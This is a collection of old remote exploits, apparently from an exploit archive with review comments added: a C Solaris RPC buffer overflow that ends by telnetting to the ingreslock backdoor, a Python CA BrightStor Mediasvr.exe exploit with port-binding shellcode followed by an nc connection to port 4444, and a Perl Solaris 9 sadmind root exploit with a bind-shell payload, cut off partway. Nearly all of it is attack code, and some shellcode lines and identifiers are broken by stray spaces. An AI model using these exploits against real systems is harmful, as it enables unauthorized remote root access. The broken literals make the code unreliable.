 * NOTE(review): the name `exp` collides with the C library's exp();
 * malloc() is unchecked and `buf` is never freed; `cl` is not destroyed
 * on the clnt_call-failure return; `reply` is not zeroed before decoding;
 * `c` is unused.
 */
int exp(char *host, int arch, unsigned long int sp, int pinging)
{
CLIENT *cl;
struct nm_send send;
struct nm_reply reply;
struct timeval tm;
enum clnt_stat stat;
int c, i, len, slen, clen, junk, a;
char *cp, *buf;
unsigned long int addr, fp;

a = (int) arch / 2;
buf = (char *) malloc(buflen[a] + 1);

if(a)
{
/* Solaris x86 */
/* fill with nops[1] truncated to one byte (0x90), then junk/4 copies of
 * sp in little-endian order starting at alignment[a] */
memset(buf, nops[a], buflen[a]);
junk = junks[arch - 2];
junk &= 0xfffffffc;

for (i = 0, cp = buf + alignment[a]; i < junk / 4; i++)
{
*cp++ = (sp >> 0) & 0xff;
*cp++ = (sp >> 8) & 0xff;
*cp++ = (sp >> 16) & 0xff;
*cp++ = (sp >> 24) & 0xff;
}

addr = sp + offset[a];

for (i = 0; i < addrlen[a] / 4; i++)
{
*cp++ = (addr >> 0) & 0xff;
*cp++ = (addr >> 8) & 0xff;
*cp++ = (addr >> 16) & 0xff;
*cp++ = (addr >> 24) & 0xff;
}

/* patch -(strlen(command)+1) into the stub at lens[1], then place the
 * stub and the command at the very end of the buffer */
slen = strlen(shellx86);
clen = strlen(command);
len = clen;
len++;
len = -len;
shellx86[lens[a]+0] = (len >> 0) & 0xff;
shellx86[lens[a]+1] = (len >> 8) & 0xff;
shellx86[lens[a]+2] = (len >> 16) & 0xff;
shellx86[lens[a]+3] = (len >> 24) & 0xff;
cp = buf + buflen[a] - 1 - clen - slen;
memcpy(cp, shellx86, slen);
cp += slen;
memcpy(cp, command, clen);
cp += clen;
*cp = '\xff';
}
else
{
/* Solaris SPARC */
/* fill with 0xff; addrlen/8 (fp, addr) pairs in big-endian order */
memset(buf, '\xff', buflen[a]);
fp = sp + FRAMELEN1 + FRAMELEN2;
fp &= 0xfffffff8;
addr = sp + offset[a];
addr &= 0xfffffffc;

for(i = 0, cp = buf + alignment[a]; i < addrlen[a] / 8; i++)
{
*cp++ = (fp >> 24) & 0xff;
*cp++ = (fp >> 16) & 0xff;
*cp++ = (fp >> 8) & 0xff;
*cp++ = (fp >> 0) & 0xff;
*cp++ = (addr >> 24) & 0xff;
*cp++ = (addr >> 16) & 0xff;
*cp++ = (addr >> 8) & 0xff;
*cp++ = (addr >> 0) & 0xff;
}

slen = strlen(shellsparc);
clen = strlen(command);
/* NOTE(review): this `len` is never read - it is overwritten below */
len = buflen[a] - 1 - clen - slen - addrlen[a] - alignment[a];
len &= 0xfffffffc;
/* lens[0]/4 copies of the 32-bit nop pattern, big-endian */
for(i = 0; i < lens[a] / 4; i++)
{
*cp++ = (nops[a] >> 24) & 0xff;
*cp++ = (nops[a] >> 16) & 0xff;
*cp++ = (nops[a] >> 8) & 0xff;
*cp++ = (nops[a] >> 0) & 0xff;
}
len = clen;
len++;
len = -len;
shellsparc[lens[a]+0] = (len >> 24) & 0xff;
shellsparc[lens[a]+1] = (len >> 16) & 0xff;
shellsparc[lens[a]+2] = (len >> 8) & 0xff;
shellsparc[lens[a]+3] = (len >> 0) & 0xff;
memcpy(cp, shellsparc, slen);
cp += slen;
memcpy(cp, command, clen);
}

/* the buffer travels as a C string, so it must contain no NUL before here */
buf[buflen[a]] = '\0';
memset(&send, 0, sizeof(struct nm_send));
send.header.uint2 = NETMGT_HEADER_TYPE;
send.header.string1 = "";
send.header.string2 = "";
send.header.string3 = "";
/* byte count of the three argument records plus terminator */
send.header.uint7 =
strlen(FW_VERSION) + 1 +
(4 * sizeof(unsigned int)) + sizeof(int) +
strlen(CLIENT_DOMAIN) + 1 +
(4 * sizeof(unsigned int)) + strlen(buf) + 1 +
strlen(FENCE) + 1 +
(4 * sizeof(unsigned int)) + sizeof(int) +
strlen(NETMGT_ENDOFARGS) + 1;
send.version.string1 = FW_VERSION;
send.version.uint1 = NETMGT_ARG_INT;
send.version.uint2 = sizeof(int);
send.version.int1 = 1;
send.string.string1 = CLIENT_DOMAIN;
send.string.uint1 = NETMGT_ARG_STRING;
send.string.uint2 = strlen(buf);
send.string.string2 = buf;
send.fence.string1 = FENCE;
send.fence.uint1 = NETMGT_ARG_INT;
send.fence.uint2 = sizeof(int);
send.fence.int1 = 666;
send.footer.string1 = NETMGT_ENDOFARGS;
cl = clnt_create(host, NETMGT_PROG, NETMGT_VERS, "udp");

if (cl == NULL)
{
clnt_pcreateerror("clnt_create");
return 0;
}

/* AUTH_UNIX with machine name "localhost", uid 0, gid 0 - the same
 * unverified-credential weakness the page's Perl script describes */
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);

if (!pinging)
{
tm.tv_sec = NETMGT_UDP_SERVICE_TIMEOUT;
tm.tv_usec = 0;

if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm))
{
fprintf(stderr, "unable to set timeout\n");
exit(1);
}

tm.tv_sec = NETMGT_UDP_SERVICE_RETRY_TIMEOUT;
tm.tv_usec = 0;

if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm))
{
fprintf(stderr, "unable to set timeout\n");
exit(1);
}

stat = clnt_call(cl, NETMGT_PROC_SERVICE,
xdr_nm_send, (caddr_t) &send,
xdr_nm_reply, (caddr_t) &reply, tm);

/* no reply (timeout) is the hoped-for outcome; the caller keeps trying */
if (stat != RPC_SUCCESS)
{
clnt_perror(cl, "clnt_call");
fprintf(stdout, "now check if exploit worked;\n");
return 0;
}

/* a well-formed reply means the service handled the request normally */
fprintf(stderr, "exploit failed; "
"RPC succeeded and returned { %u, %u, \"%s\" }\n",
reply.uint1, reply.uint2, reply.string1);
clnt_destroy(cl);
exit(1);
}
else
{

tm.tv_sec = NETMGT_UDP_PING_TIMEOUT;
tm.tv_usec = 0;

if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm))
{
fprintf(stderr, "unable to set timeout\n");
exit(1);
}

tm.tv_sec = NETMGT_UDP_PING_RETRY_TIMEOUT;
tm.tv_usec = 0;

if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm))
{
fprintf(stderr, "unable to set timeout\n");
exit(1);
}

/* procedure 0 with void arguments: only checks the service answers */
stat = clnt_call(cl, NETMGT_PROC_PING,
xdr_void, NULL,
xdr_void, NULL, tm);

if (stat != RPC_SUCCESS)
{
clnt_perror(cl, "clnt_call");
exit(1);
}

clnt_destroy(cl);
return 0;
}
}

/*
 * Entry point.  Parses -t host, -a arch (0..3, see usage()), -i increment,
 * -s size and -p (ping only), then calls exp() for addresses sp[arch] +/- i
 * for i in [0, size) stepping by `inc`, and finally execs telnet to the
 * target's "ingreslock" service.
 *
 * NOTE(review):
 *  - `arch` is never initialised, so omitting -a reads an indeterminate
 *    value before the range check.
 *  - every option reads argv[i+1] without checking i+1 < argc.
 *  - the loop starts at i = 0, so argv[0] is compared against the flags.
 *  - execl() is given no terminating NULL argument, which is undefined
 *    behaviour; its argv[0] is also `host` rather than "telnet", and
 *    "telnet" is a relative path resolved against the current directory.
 */
int main(int argc, char *argv[])
{
int i, arch;
char *host = "";
int pinging = 0, inc = 4, size = 2048;
unsigned long int addr;

for(i=0;i<argc;i++)
{
if(!strcmp(argv[i], "-t"))
host = argv[i+1];
if(!strcmp(argv[i], "-a"))
arch = atoi(argv[i+1]);
if(!strcmp(argv[i], "-i"))
inc = atoi(argv[i+1]);
if(!strcmp(argv[i], "-s"))
size = atoi(argv[i+1]);
if(!strcmp(argv[i], "-p"))
pinging = 1;
}

if(arch > 3 || arch < 0)
usage(argv[0]);
if(size < 0)
usage(argv[0]);
if(inc < 0)
usage(argv[0]);

/* sweep outward from the table value in both directions */
for(i = 0; i < size; i+=inc)
{
addr = sp[arch] + i;
exp(host, arch, addr, pinging);
addr = sp[arch] - i;
exp(host, arch, addr, pinging);
}

execl("telnet", host, "ingreslock");
return 0;
}


// [2000-12-01]


111 CA BrightStor Backup 11.5.2.0 (Mediasvr.exe) Remote Code Exploit



#!/usr/bin/python
#
# Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Code Exploit
# (Previously Unknown)
#
# There seems to be a design error in the handling of RPC data with xdr procedures
# across several .dll's imported by Mediasvr.exe. Four bytes from an RPC packet are
# processed as a particular address (xdr_handle_t data which is run through multiple bit
# shifts, and reversing of bytes), and eventually loaded into ECX.
#
# The 191 (0xbf) procedure, followed by nulls (at least 8 bytes of nulls, which may
# be Null Credentials and Auth?) leads to an exploitable condition.
#
# .text:0040AACD 008 mov ecx, [esp+8]
# .text:0040AAD1 008 mov dword_418820, esi
# .text:0040AAD7 008 push offset dword_418820
# .text:0040AADC 00C mov eax, [ecx]
# .text:0040AADE 00C call dword ptr [eax+2Ch]
#
# At this point, you have control of ECX (esp+8 is your address data). The data from the packet
# is stored in memory and is relatively static (see NOTE).
#
# The address is then loaded into EAX, and then called as EAX+2Ch, which is
# controllable data from the packet. In this code, I just jump ahead to
# the portbinding shellcode.
#
# NOTE: The only issue I have found is when the system is rebooted, the packet data
# appears at a higher memory location when Mediasvr.exe crashes
# and is restarted. I have accounted for this in the code, when the port that
# Mediasvr.exe is listening on is below TCP port 1100, which is usually only after
# a reboot
#
# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest
# CA patches on Windows XP SP2 (I believe there is some issue with SP1, which
# is more than likely the memory locations)
#
# The patches include the following updates to Mediasvr.exe
# http://supportconnectw.ca.com/public/storage/infodocs/babimpsec-notice.asp
#
# CA has been notified
#
# Author: M. Shirk
# Tester: Tebodell
#
# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com
#
# Use at your own Risk: You have been warned
#------------------------------------------------------------------------

import os
import sys
import time
import socket
import struct

#------------------------------------------------------------------------

#------------------------------------------------------------------------
# Second-stage payload appended to both RPC packets below.  Per the comment
# it is a port-binding shell on TCP 4444; the leading 0x90 bytes are a nop
# sled.  For defenders, an unexpected listener on 4444 owned by the
# Mediasvr.exe process is the host-side artefact to look for.
#
# NOTE(review): every line of this literal contains a stray space inside an
# escape ("\x 90", "\x 49", ...) introduced when the page wrapped the
# lines.  "\x" must be followed by two hex digits, so as reproduced here
# the module does not even compile; the bytes described above are not what
# this text encodes.
#------------------------------------------------------------------------
#Portbind shellcode; Binds shell on TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x36\x4b\x4e"
shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x46\x4b\x58"
shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x 4b\x48\x4e\x57"
shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x 4a\x51\x4b\x38"
shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x 46\x33\x4b\x58"
shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x 46\x48\x42\x4c"
shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e"
shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x 45\x4e\x4b\x48"
shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x 4e\x50\x4b\x54"
shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x 4e\x32\x4b\x58"
shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x 41\x53\x4b\x4d"
shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x 4e\x30\x4b\x38"
shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x 50\x55\x4a\x56"
shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x 48\x4d\x48\x36"
shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x 47\x37\x43\x57"
shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x 4b\x4c\x4d\x4e"
shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x 49\x38\x45\x4e"
shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x 4c\x36\x44\x30"
shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x 4d\x4a\x47\x35"
shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x 43\x35\x43\x34"
shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x 4a\x36\x41\x41"
shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x 4a\x56\x46\x4a"
shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x 4c\x46\x42\x31"
shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x 4d\x4a\x50\x42"
shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x 4f\x4f\x48\x4d"
shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x 43\x39\x4a\x56"
shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x 48\x4d\x45\x45"
shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x 4a\x46\x43\x46"
shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x 49\x52\x4e\x4c"
shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x 41\x53\x42\x4c"
shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x 44\x34\x4e\x32"
shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x36"
shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x 46\x34\x4f\x4f"
shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x 41\x55\x4c\x36"
shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x 42\x4d\x4a\x56"
shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x 48\x4d\x4c\x56"
shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x 47\x55\x4e\x4f"
shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x 4f\x4f\x48\x4d"
shellcode += "\x4f\x4f\x42\x4d\x5a\x90"

#------------------------------------------------------------------------

#First Packet
rpc_packet1="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x 00\x00\x00"
rpc_packet1+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01"

#Procedure 191 and nulls
rpc_packet1+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00"

#Apparently these 4 bytes can be anything
rpc_packet1+="\x00\x00\x00\x00"

#This value is important for the location of the next address
rpc_packet1+="\x00\x00\x00\x00"

#Hardcoded Address loaded into ECX
rpc_packet1+="\x00\xae\x27\x64"

#Just spacing
rpc_packet1+="\x41\x42\x43\x44"

#Address in memory, loaded into EAX and called with EAX+2Ch to get to shellcode
rpc_packet1+="\x3c\x27\xae\x00"

#jump to shellcode for packet 1
rpc_packet1+="\x6c\x27\xae\x00"
rpc_packet1+="\xeb\x01"
rpc_packet1+=shellcode

#------------------------------------------------------------------------

#Second Packet
rpc_packet2="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x 00\x00\x00"
rpc_packet2+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01"

#Procedure 191 and nulls
rpc_packet2+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00"

#Apparently these 4 bytes can be anything
rpc_packet2+="\x00\x00\x00\x00"

#This value is important for the location of the next address
rpc_packet2+="\x00\x00\x00\x00"

#Hardcoded Address loaded into ECX that seems to be hit after Mediasvr.exe has been
#restarted
rpc_packet2+="\x00\x9e\x27\x64"

#Just spacing
rpc_packet2+="\x41\x42\x43\x44"

#Address stored in memory, loaded into EAX and called with EAX+2Ch to get to shellcode
rpc_packet2+="\x3c\x27\x9e\x00"

#jump to shellcode for packet 2
rpc_packet2+="\x6c\x27\x9e\x00"
rpc_packet2+="\xeb\x01"
rpc_packet2+=shellcode

# Portmap request for Mediasvr.exe
rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x 00\x00\x00"
rpc_portmap_req+="\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x 03\x00\x00"
rpc_portmap_req+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00"
rpc_portmap_req+="\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x06\x00\x 00\x00\x00"

#------------------------------------------------------------------------

def GetMediaSvrPort(target):
    """Ask the target's portmapper (TCP/111) which port Mediasvr.exe uses, then
    hand off to ExploitMediaSvr with packet 1 or packet 2.

    The request is the module-level rpc_portmap_req; the last four bytes of
    whatever reply arrives are decoded big-endian as the port number.
    Python 2 code (print statement, str used as bytes). Returns None.
    """
    # No try/finally: an exception between connect() and close() leaks the socket.
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.connect((target,111))
    sock.send(rpc_portmap_req)
    rec = sock.recv(256)
    sock.close()

    # Last four bytes of the reply; an empty or short reply raises IndexError here.
    port1 = rec[-4]
    port2 = rec[-3]
    port3 = rec[-2]
    port4 = rec[-1]

    # Roundabout big-endian decode: byte -> hex text -> int -> 8 hex digits -> int.
    port1 = hex(ord(port1))
    port2 = hex(ord(port2))
    port3 = hex(ord(port3))
    port4 = hex(ord(port4))
    # NOTE(review): "por t4" looks like an extraction artifact for port4; as
    # pasted this line does not parse.
    port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(por t4,16))

    port = int(port,16)
    # Original author's heuristic: a port below 1100 means the service has not
    # been restarted since boot -> packet 1; otherwise packet 2 (see the comments
    # on rpc_packet1 / rpc_packet2 above for how they differ).
    if port < 1100:
        print '[+] Fresh Meat: Mediasvr.exe has not been restarted, Sending Packet 1 to: Target: %s Port: %s' %(target,port)
        ExploitMediaSvr(target,port,1)
    else:
        print '[+] Mediasvr.exe has been restarted, Sending Packet 2 to: Target: %s Port: %s' % (target,port)
        ExploitMediaSvr(target,port,2)

def ExploitMediaSvr(target,port,p):
    """Open a TCP connection to target:port and send the module-level
    rpc_packet1 (p == 1) or rpc_packet2 (p == 2), then close.

    Any other value of p opens and closes the connection without sending
    anything. No reply is read; the return value is always None.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target, port))
    if p == 1:
        sock.send(rpc_packet1)
    elif p == 2:
        sock.send(rpc_packet2)
    sock.close ()


if __name__=="__main__":
    # The only argument is the target address; a missing argument prints the
    # banner/usage and exits with -1.
    try:
        target = sys.argv[1]
    except IndexError:
        print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'
        print '[+] Author: Shirkdog'
        print '[+] Usage: %s <target ip>\n' % sys.argv[0]
        sys.exit(-1)

    print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'
    print '[+] Author: Shirkdog'

    GetMediaSvrPort(target)

    # Waits 3 s, then shells out to nc against TCP/4444 on the target (the port
    # named in the message below). NOTE(review): the command line is built by
    # string concatenation and run through the shell, so shell metacharacters in
    # argv[1] would be executed locally.
    print '[+] Exploit sent. Using nc to connect to: %s on port 4444' % target
    time.sleep(3)
    connect = "/usr/bin/nc -vn " + target + " 4444"
    os.system(connect)

# [2007-03-29]


111 Solaris 9 [UltraSPARC] sadmind Remote Root Exploit



#!/usr/bin/perl
# holygrail2 #
#---------------------------------------------------------------------------------#
# SunOS 5.9 [UltraSPARC] sadmind Remote Root Exploit by KingCope in 2008 #
# #
# Most of the work was shamelessly ripped from HD-Moore and RISE-Security exploits!!! #
# Bug found by RISE-Security. #
# Sparc exploit by KingCope [[email protected]] #
# Maybe I will extend this to Solaris 8/10/11 in futura ?? #
# thanks to alex,andi,adize ... #
# #
################################################## #################################

use strict;
use POSIX;
use IO::Socket;
use IO::Select;

# NOTE(review): `use warnings` is absent, so an undefined $ARGV[0] in the
# `eq ""` test below is silently treated as the empty string.
print "holygrail2 vs. SunOS 5.9 sadmind\nby kcope in 2008\nbinds a shell to port 5555\n";
my $host = $ARGV[0];

# Bare-minimum argument check: exactly one positional argument, the target address.
if ($host eq "") {
print "usage: perl holygrail2.pl <address>\n";
exit(-1);
}

# solaris_sparc_bind - LPORT=5555 Size=232 Encoder=Sparc http://metasploit.com
# Encoded SPARC payload per the generator line above; the banner printed earlier
# says it binds a shell on TCP 5555, so an unexpected listener on that port on a
# Solaris host is the post-event indicator.
my $payload =
"\x23\x32\xde\xd7\xa2\x14\x62\x6f\x20\xbf\xff\xff\x 20\xbf\xff\xff".
"\x7f\xff\xff\xff\xea\x03\xe0\x20\xaa\x9d\x40\x11\x ea\x23\xe0\x20".
"\xa2\x04\x40\x15\x81\xdb\xe0\x20\x12\xbf\xff\xfb\x 9e\x03\xe0\x04".
"\x57\x50\xfe\x68\xff\xb6\xde\x77\x69\xad\xde\x7c\x 01\xcb\x1e\x89".
"\xbb\xfc\xbe\x8f\x2b\xec\x9e\x8d\xce\x1c\xfe\x77\x 5f\xcc\xdf\x7f".
"\x8f\xce\xa0\x87\x11\x10\xdf\xf2\xf1\x04\xfe\x4f\x 11\x06\xbe\x5f".
"\x11\x6b\x7e\x6b\x03\x4f\x21\x83\xb7\x80\x01\xb3\x 35\xb0\x61\x5b".
"\xa8\x60\x42\x93\x1b\x83\x3d\x5b\x09\x94\x62\x9a\x af\x84\x42\x75".
"\x3e\x74\xa3\x8d\x91\x77\x1c\x75\x83\x62\x23\x8c\x 37\x80\xe3\x87".
"\xb5\xb4\xc3\x7d\x28\x65\x24\x89\x9b\xa6\x9b\x71\x 8f\xb8\xc4\x82".
"\x3d\xa9\x24\x8d\xd5\x6b\x84\x8c\x54\x7b\xe4\xb0\x c9\xab\xc4\xc4".
"\xf8\xf3\xfb\x28\x2d\x0f\xbb\x28\x59\x15\x04\xc3\x 40\x21\x5c\x49".
"\x22\x22\x7c\x03\x01\x41\xa2\x01\xd5\x75\xfb\xa5\x 47\x5a\x5b\xcd".
"\x87\xa6\x24\x3d\x97\xfa\xe4\x45\xd7\xde\xa4\x49\x 5a\x30\xfb\x8a".
"\xcb\xe0\xdb\xe4\xec\x01\x1b\xf4";

# Hard-coded addresses, apparently for the single SunOS 5.9 / UltraSPARC layout
# named in the header. Only $retaddr is used (by rpc_sadmin_expl); $patchaddr is
# assigned here but never read anywhere in this file.
my $patchaddr = pack("N", 0xffbf83d8);
my $retaddr = pack("N", 0xffbf88e0);

# Switch a filehandle to non-blocking mode so later reads can be bounded by
# IO::Select timeouts instead of blocking indefinitely.
# Args: $fd — an open filehandle. Returns the result of the second fcntl.
sub nonblock {
my ($fd) = @_;
my $flags = fcntl($fd, F_GETFL,0);
# NOTE(review): neither fcntl call is checked; on failure the handle silently
# stays blocking.
fcntl($fd, F_SETFL, $flags|O_NONBLOCK);
}

# Wait up to 4 seconds for $s to become readable, then perform one <$s> read
# per ready handle and concatenate the results.
# Args: $s — a socket (non-blocking, as created by rpc_socket).
# Returns: the data read, or undef when nothing became readable in time, so
# callers must treat undef as "no reply".
sub rpc_read {
my ($s) = @_;
my $sel = IO::Select->new($s);
my $res;
my @fds = $sel->can_read(4);
foreach (@fds) { $res .= <$s>; }
return $res;
}

# Portmapper v2 GETPORT over UDP: ask $target_host:$target_port which port
# serves RPC program $prog, version $vers, protocol UDP (0x11).
# Returns: the port number from a 28-byte reply (port field at offset 24), or
# undef when no such reply arrived within rpc_read's timeout.
# Detection note: a GETPORT for an unusual program number arriving at UDP/111
# from outside the management network is the reconnaissance step that precedes
# the request built by rpc_sadmin_expl.
sub rpc_getport {
my ($target_host, $target_port, $prog, $vers) = @_;

my $s = rpc_socket($target_host, $target_port);

my $portmap_req =

pack("L", rand() * 0xffffffff) . # XID (native byte order; opaque to the server)
"\x00\x00\x00\x00". # Call
"\x00\x00\x00\x02". # RPC Version
"\x00\x01\x86\xa0". # Program Number (PORTMAP)
"\x00\x00\x00\x02". # Program Version (2)
"\x00\x00\x00\x03". # Procedure (getport)
("\x00" x 16). # Credentials and Verifier
pack("N", $prog) .
pack("N", $vers).
pack("N", 0x11). # Protocol: UDP
pack("N", 0x00); # Port: 0

print $s $portmap_req;

my $r = rpc_read($s);
close ($s);

# Only an exactly 28-byte reply is accepted; anything else (including undef,
# whose length is 0) is treated as failure.
if (length($r) == 28)
{
my $prog_port = unpack("N",substr($r, 24, 4));
return($prog_port);
}

# NOTE(review): `return undef` yields a one-element list in list context; the
# caller in this file assigns to a scalar, so its `if (! $target_port)` works.
return undef;
}

# Open a UDP socket to $target_host:$target_port, make it autoflushing and
# non-blocking, and return it.
# NOTE(review): on failure it prints to STDOUT and exits with status 0, so a
# wrapper cannot distinguish "could not connect" from success by exit code.
sub rpc_socket {
my ($target_host, $target_port) = @_;
my $s = IO::Socket::INET->new
(
PeerAddr => $target_host,
PeerPort => $target_port,
Proto => "udp",
Type => SOCK_DGRAM
);

if (! $s)
{
print "\nError: could not create socket to target: $!\n";
exit(0);
}

# Autoflush the new socket, then restore STDOUT as the default output handle
# (also autoflushed).
select($s); $|++;
select(STDOUT); $|++;
nonblock($s);
return($s);
}

# Build one sadmind request datagram (program 0x18788 = 100232, version 10,
# procedure 1) as a string; nothing is sent from here.
# Args: $hostname — used in the AUTH_UNIX credentials and the ADM_HOST /
#       ADM_CLIENT_HOST fields; $command — copied into a 512-byte zero-padded
#       slot near the end of the body; $first — when it string-equals 1 the
#       ADM_METHOD value is 50 NOP bytes instead of the full multi-kilobyte buffer.
# Returns: RPC header + auth + ADM key/value body as one string.
# Detection notes, all visible in the fields below: AUTH_UNIX credentials
# claiming UID 0 / GID 0 from the network, a credential timestamp ~20000 s in
# the future, and an ADM_METHOD value of several kilobytes.
sub rpc_sadmin_expl {
my ($hostname, $command, $first) = @_;
# Fixed 59-byte host field; a $hostname longer than 59 bytes gives a negative
# repeat count and the field is then just the unpadded name.
my $packed_host = $hostname . ("\x00" x (59 - length($hostname)));

my $rpc =
pack("L", rand() * 0xffffffff) . # XID
"\x00\x00\x00\x00". # Call
"\x00\x00\x00\x02". # RPC Version
"\x00\x01\x87\x88". # Program Number (SADMIND)
"\x00\x00\x00\x0a". # Program Version (10)
"\x00\x00\x00\x01". # Procedure
"\x00\x00\x00\x01"; # Credentials (UNIX)
# Auth Length is filled in

# pad it up to multiples of 4
my $rpc_hostname = $hostname;
while (length($rpc_hostname) % 4 != 0) { $rpc_hostname .= "\x00" }

my $rpc_auth =
# Time Stamp
pack("N", time() + 20001) .

# Machine Name
pack("N", length($hostname)) . $rpc_hostname .

"\x00\x00\x00\x00". # UID = 0
"\x00\x00\x00\x00". # GID = 0
"\x00\x00\x00\x00"; # No Extra Groups


# Auth length + auth body + 8 zero bytes (empty verifier).
$rpc .= pack("N", length($rpc_auth)) . $rpc_auth . ("\x00" x 8);

my $fp = pack("N", 0xffbf9108);
my $buf1 = "\x90" x (2050-length($payload)-500) . $payload . "\x90\x90" . "\x90" x 500 . "CC" . $fp . $fp . $retaddr x 100;

# String comparison against a number; the caller passes the loop index 1 or 2.
if ($first eq 1) {
$buf1 = "\x90" x 50;
}

while (length($buf1) % 4 != 0) { $buf1 .= "\x00" }

my $header =

# Another Time Stamp
reverse(pack("L", time() + 20005)) .

"\x00\x07\x45\xdf".

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04".

"\x7f\x00\x00\x01". # 127.0.0.1
"\x00\x01\x87\x88". # SADMIND

"\x00\x00\x00\x0a\x00\x00\x00\x04".

"\x7f\x00\x00\x01". # 127.0.0.1
"\x00\x01\x87\x88". # SADMIND

